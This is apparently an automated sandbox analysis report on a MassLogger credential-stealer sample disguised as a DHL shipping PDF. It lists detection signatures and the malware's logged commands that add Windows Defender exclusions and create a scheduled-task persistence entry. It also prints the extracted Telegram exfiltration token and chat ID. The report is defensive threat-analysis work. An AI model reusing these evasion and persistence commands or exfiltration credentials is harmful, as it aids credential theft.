Edit tour

Windows Analysis Report
DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Overview

General Information

Sample name:	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Analysis ID:	1636421
MD5:	fd2765443b95b23c0ab9fa091a6182aa
SHA1:	aad32e77eb7ecdd3e0909d1018a6fca8c4e26fc5
SHA256:	7fc21521b3e61d0555c0c1adb947d9724c8ca61dc9caeef85a110ec46d3b2d5d
Tags:	DHLexeuser-abuse_ch
Infos:

Detection

MSIL Logger, MassLogger RAT

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected MSIL Logger

Yara detected MassLogger RAT

Yara detected Telegram RAT

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Adds a directory exclusion to Windows Defender

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates processes with suspicious names

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

DHL Shipping Details Ref ID 446331798008765975594-pdf.exe (PID: 6808 cmdline: "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe" MD5: FD2765443B95B23C0AB9FA091A6182AA)

powershell.exe (PID: 6020 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 6592 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6300 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PZgkJsntUXo" /XML "C:\Users\user\AppData\Local\Temp\tmp2454.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

DHL Shipping Details Ref ID 446331798008765975594-pdf.exe (PID: 5472 cmdline: "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe" MD5: FD2765443B95B23C0AB9FA091A6182AA)

DHL Shipping Details Ref ID 446331798008765975594-pdf.exe (PID: 5608 cmdline: "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe" MD5: FD2765443B95B23C0AB9FA091A6182AA)

PZgkJsntUXo.exe (PID: 6160 cmdline: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe MD5: FD2765443B95B23C0AB9FA091A6182AA)

schtasks.exe (PID: 2352 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PZgkJsntUXo" /XML "C:\Users\user\AppData\Local\Temp\tmp3358.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PZgkJsntUXo.exe (PID: 7156 cmdline: "C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe" MD5: FD2765443B95B23C0AB9FA091A6182AA)

svchost.exe (PID: 6900 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7208417702:AAEVwXEzB7QSAuFkwz3SdCf4I3txnqmflEw", "Telegram Chatid": "7731003424"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7fdf:$a1: get_encryptedPassword 0x8307:$a2: get_encryptedUsername 0x7d7a:$a3: get_timePasswordChanged 0x7e9b:$a4: get_passwordField 0x7ff5:$a5: set_encryptedPassword 0x9951:$a7: get_logins 0x9602:$a8: GetOutlookPasswords 0x93f4:$a9: StartKeylogger 0x98a1:$a10: KeyLoggerEventArgs 0x9451:$a11: KeyLoggerEventArgsEventHandler
00000008.00000002.2179384145.0000000002A04000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xfb7f:$a1: get_encryptedPassword 0x2699f:$a1: get_encryptedPassword 0x3d5bf:$a1: get_encryptedPassword 0xfea7:$a2: get_encryptedUsername 0x26cc7:$a2: get_encryptedUsername 0x3d8e7:$a2: get_encryptedUsername 0xf91a:$a3: get_timePasswordChanged 0x2673a:$a3: get_timePasswordChanged 0x3d35a:$a3: get_timePasswordChanged 0xfa3b:$a4: get_passwordField 0x2685b:$a4: get_passwordField 0x3d47b:$a4: get_passwordField 0xfb95:$a5: set_encryptedPassword 0x269b5:$a5: set_encryptedPassword 0x3d5d5:$a5: set_encryptedPassword 0x114f1:$a7: get_logins 0x28311:$a7: get_logins 0x3ef31:$a7: get_logins 0x111a2:$a8: GetOutlookPasswords 0x27fc2:$a8: GetOutlookPasswords 0x3ebe2:$a8: GetOutlookPasswords
00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf2f7:$a1: get_encryptedPassword 0x26117:$a1: get_encryptedPassword 0x3cd37:$a1: get_encryptedPassword 0xf61f:$a2: get_encryptedUsername 0x2643f:$a2: get_encryptedUsername 0x3d05f:$a2: get_encryptedUsername 0xf092:$a3: get_timePasswordChanged 0x25eb2:$a3: get_timePasswordChanged 0x3cad2:$a3: get_timePasswordChanged 0xf1b3:$a4: get_passwordField 0x25fd3:$a4: get_passwordField 0x3cbf3:$a4: get_passwordField 0xf30d:$a5: set_encryptedPassword 0x2612d:$a5: set_encryptedPassword 0x3cd4d:$a5: set_encryptedPassword 0x10c69:$a7: get_logins 0x27a89:$a7: get_logins 0x3e6a9:$a7: get_logins 0x1091a:$a8: GetOutlookPasswords 0x2773a:$a8: GetOutlookPasswords 0x3e35a:$a8: GetOutlookPasswords
0000000D.00000002.2179488891.00000000031A3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6808	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6808	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6808	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6808	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6808	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6808	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x4fe74:$a1: get_encryptedPassword 0x5018d:$a2: get_encryptedUsername 0x4fc23:$a3: get_timePasswordChanged 0x4fd44:$a4: get_passwordField 0x4fe8a:$a5: set_encryptedPassword 0x5178d:$a7: get_logins 0x5143e:$a8: GetOutlookPasswords 0x51230:$a9: StartKeylogger 0x516dd:$a10: KeyLoggerEventArgs 0x5128d:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 5608	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PZgkJsntUXo.exe PID: 6160	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: PZgkJsntUXo.exe PID: 6160	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PZgkJsntUXo.exe PID: 6160	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PZgkJsntUXo.exe PID: 6160	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: PZgkJsntUXo.exe PID: 6160	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: PZgkJsntUXo.exe PID: 6160	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2eb2f:$a1: get_encryptedPassword 0x2ee48:$a2: get_encryptedUsername 0x2e8de:$a3: get_timePasswordChanged 0x2e9ff:$a4: get_passwordField 0x2eb45:$a5: set_encryptedPassword 0x30448:$a7: get_logins 0x300f9:$a8: GetOutlookPasswords 0x2feeb:$a9: StartKeylogger 0x30398:$a10: KeyLoggerEventArgs 0x2ff48:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: PZgkJsntUXo.exe PID: 7156	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: PZgkJsntUXo.exe PID: 7156	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PZgkJsntUXo.exe PID: 7156	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: PZgkJsntUXo.exe PID: 7156	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: PZgkJsntUXo.exe PID: 7156	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x61cc:$a1: get_encryptedPassword 0x64e5:$a2: get_encryptedUsername 0x5f7b:$a3: get_timePasswordChanged 0x609c:$a4: get_passwordField 0x61e2:$a5: set_encryptedPassword 0x7ae5:$a7: get_logins 0x7796:$a8: GetOutlookPasswords 0x7588:$a9: StartKeylogger 0x7a35:$a10: KeyLoggerEventArgs 0x75e5:$a11: KeyLoggerEventArgsEventHandler
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3df:$a1: get_encryptedPassword 0xd707:$a2: get_encryptedUsername 0xd17a:$a3: get_timePasswordChanged 0xd29b:$a4: get_passwordField 0xd3f5:$a5: set_encryptedPassword 0xed51:$a7: get_logins 0xea02:$a8: GetOutlookPasswords 0xe7f4:$a9: StartKeylogger 0xeca1:$a10: KeyLoggerEventArgs 0xe851:$a11: KeyLoggerEventArgsEventHandler
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1238b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11889:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b97:$a4: \Orbitum\User Data\Default\Login Data 0x1298f:$a5: \Kometa\User Data\Default\Login Data
9.2.PZgkJsntUXo.exe.42e17c0.4.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.PZgkJsntUXo.exe.42e17c0.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.PZgkJsntUXo.exe.42e17c0.4.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.2.PZgkJsntUXo.exe.42e17c0.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.PZgkJsntUXo.exe.42e17c0.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3df:$a1: get_encryptedPassword 0xd707:$a2: get_encryptedUsername 0xd17a:$a3: get_timePasswordChanged 0xd29b:$a4: get_passwordField 0xd3f5:$a5: set_encryptedPassword 0xed51:$a7: get_logins 0xea02:$a8: GetOutlookPasswords 0xe7f4:$a9: StartKeylogger 0xeca1:$a10: KeyLoggerEventArgs 0xe851:$a11: KeyLoggerEventArgsEventHandler
9.2.PZgkJsntUXo.exe.42e17c0.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1238b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11889:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b97:$a4: \Orbitum\User Data\Default\Login Data 0x1298f:$a5: \Kometa\User Data\Default\Login Data
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3df:$a1: get_encryptedPassword 0xd707:$a2: get_encryptedUsername 0xd17a:$a3: get_timePasswordChanged 0xd29b:$a4: get_passwordField 0xd3f5:$a5: set_encryptedPassword 0xed51:$a7: get_logins 0xea02:$a8: GetOutlookPasswords 0xe7f4:$a9: StartKeylogger 0xeca1:$a10: KeyLoggerEventArgs 0xe851:$a11: KeyLoggerEventArgsEventHandler
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1238b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11889:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b97:$a4: \Orbitum\User Data\Default\Login Data 0x1298f:$a5: \Kometa\User Data\Default\Login Data
9.2.PZgkJsntUXo.exe.42ca9a0.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.PZgkJsntUXo.exe.42ca9a0.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.PZgkJsntUXo.exe.42ca9a0.3.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.2.PZgkJsntUXo.exe.42ca9a0.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.PZgkJsntUXo.exe.42ca9a0.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3df:$a1: get_encryptedPassword 0xd707:$a2: get_encryptedUsername 0xd17a:$a3: get_timePasswordChanged 0xd29b:$a4: get_passwordField 0xd3f5:$a5: set_encryptedPassword 0xed51:$a7: get_logins 0xea02:$a8: GetOutlookPasswords 0xe7f4:$a9: StartKeylogger 0xeca1:$a10: KeyLoggerEventArgs 0xe851:$a11: KeyLoggerEventArgsEventHandler
9.2.PZgkJsntUXo.exe.42ca9a0.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1238b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11889:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b97:$a4: \Orbitum\User Data\Default\Login Data 0x1298f:$a5: \Kometa\User Data\Default\Login Data
9.2.PZgkJsntUXo.exe.42e17c0.4.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.PZgkJsntUXo.exe.42e17c0.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.PZgkJsntUXo.exe.42e17c0.4.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.2.PZgkJsntUXo.exe.42e17c0.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.PZgkJsntUXo.exe.42e17c0.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1df:$a1: get_encryptedPassword 0x25dff:$a1: get_encryptedPassword 0xf507:$a2: get_encryptedUsername 0x26127:$a2: get_encryptedUsername 0xef7a:$a3: get_timePasswordChanged 0x25b9a:$a3: get_timePasswordChanged 0xf09b:$a4: get_passwordField 0x25cbb:$a4: get_passwordField 0xf1f5:$a5: set_encryptedPassword 0x25e15:$a5: set_encryptedPassword 0x10b51:$a7: get_logins 0x27771:$a7: get_logins 0x10802:$a8: GetOutlookPasswords 0x27422:$a8: GetOutlookPasswords 0x105f4:$a9: StartKeylogger 0x27214:$a9: StartKeylogger 0x10aa1:$a10: KeyLoggerEventArgs 0x276c1:$a10: KeyLoggerEventArgs 0x10651:$a11: KeyLoggerEventArgsEventHandler 0x27271:$a11: KeyLoggerEventArgsEventHandler
9.2.PZgkJsntUXo.exe.42e17c0.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1418b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2adab:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13689:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a2a9:$a3: \Google\Chrome\User Data\Default\Login Data 0x13997:$a4: \Orbitum\User Data\Default\Login Data 0x2a5b7:$a4: \Orbitum\User Data\Default\Login Data 0x1478f:$a5: \Kometa\User Data\Default\Login Data 0x2b3af:$a5: \Kometa\User Data\Default\Login Data
9.2.PZgkJsntUXo.exe.42ca9a0.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.PZgkJsntUXo.exe.42ca9a0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.PZgkJsntUXo.exe.42ca9a0.3.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.2.PZgkJsntUXo.exe.42ca9a0.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.PZgkJsntUXo.exe.42ca9a0.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1df:$a1: get_encryptedPassword 0x25fff:$a1: get_encryptedPassword 0x3cc1f:$a1: get_encryptedPassword 0xf507:$a2: get_encryptedUsername 0x26327:$a2: get_encryptedUsername 0x3cf47:$a2: get_encryptedUsername 0xef7a:$a3: get_timePasswordChanged 0x25d9a:$a3: get_timePasswordChanged 0x3c9ba:$a3: get_timePasswordChanged 0xf09b:$a4: get_passwordField 0x25ebb:$a4: get_passwordField 0x3cadb:$a4: get_passwordField 0xf1f5:$a5: set_encryptedPassword 0x26015:$a5: set_encryptedPassword 0x3cc35:$a5: set_encryptedPassword 0x10b51:$a7: get_logins 0x27971:$a7: get_logins 0x3e591:$a7: get_logins 0x10802:$a8: GetOutlookPasswords 0x27622:$a8: GetOutlookPasswords 0x3e242:$a8: GetOutlookPasswords
9.2.PZgkJsntUXo.exe.42ca9a0.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1418b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2afab:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x41bcb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13689:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a4a9:$a3: \Google\Chrome\User Data\Default\Login Data 0x410c9:$a3: \Google\Chrome\User Data\Default\Login Data 0x13997:$a4: \Orbitum\User Data\Default\Login Data 0x2a7b7:$a4: \Orbitum\User Data\Default\Login Data 0x413d7:$a4: \Orbitum\User Data\Default\Login Data 0x1478f:$a5: \Kometa\User Data\Default\Login Data 0x2b5af:$a5: \Kometa\User Data\Default\Login Data 0x421cf:$a5: \Kometa\User Data\Default\Login Data
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1df:$a1: get_encryptedPassword 0x25dff:$a1: get_encryptedPassword 0xf507:$a2: get_encryptedUsername 0x26127:$a2: get_encryptedUsername 0xef7a:$a3: get_timePasswordChanged 0x25b9a:$a3: get_timePasswordChanged 0xf09b:$a4: get_passwordField 0x25cbb:$a4: get_passwordField 0xf1f5:$a5: set_encryptedPassword 0x25e15:$a5: set_encryptedPassword 0x10b51:$a7: get_logins 0x27771:$a7: get_logins 0x10802:$a8: GetOutlookPasswords 0x27422:$a8: GetOutlookPasswords 0x105f4:$a9: StartKeylogger 0x27214:$a9: StartKeylogger 0x10aa1:$a10: KeyLoggerEventArgs 0x276c1:$a10: KeyLoggerEventArgs 0x10651:$a11: KeyLoggerEventArgsEventHandler 0x27271:$a11: KeyLoggerEventArgsEventHandler
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b0a118.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1df:$a1: get_encryptedPassword 0x25fff:$a1: get_encryptedPassword 0x3cc1f:$a1: get_encryptedPassword 0xf507:$a2: get_encryptedUsername 0x26327:$a2: get_encryptedUsername 0x3cf47:$a2: get_encryptedUsername 0xef7a:$a3: get_timePasswordChanged 0x25d9a:$a3: get_timePasswordChanged 0x3c9ba:$a3: get_timePasswordChanged 0xf09b:$a4: get_passwordField 0x25ebb:$a4: get_passwordField 0x3cadb:$a4: get_passwordField 0xf1f5:$a5: set_encryptedPassword 0x26015:$a5: set_encryptedPassword 0x3cc35:$a5: set_encryptedPassword 0x10b51:$a7: get_logins 0x27971:$a7: get_logins 0x3e591:$a7: get_logins 0x10802:$a8: GetOutlookPasswords 0x27622:$a8: GetOutlookPasswords 0x3e242:$a8: GetOutlookPasswords
Click to see the 41 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe", ParentImage: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, ParentProcessId: 6808, ParentProcessName: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe", ProcessId: 6020, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

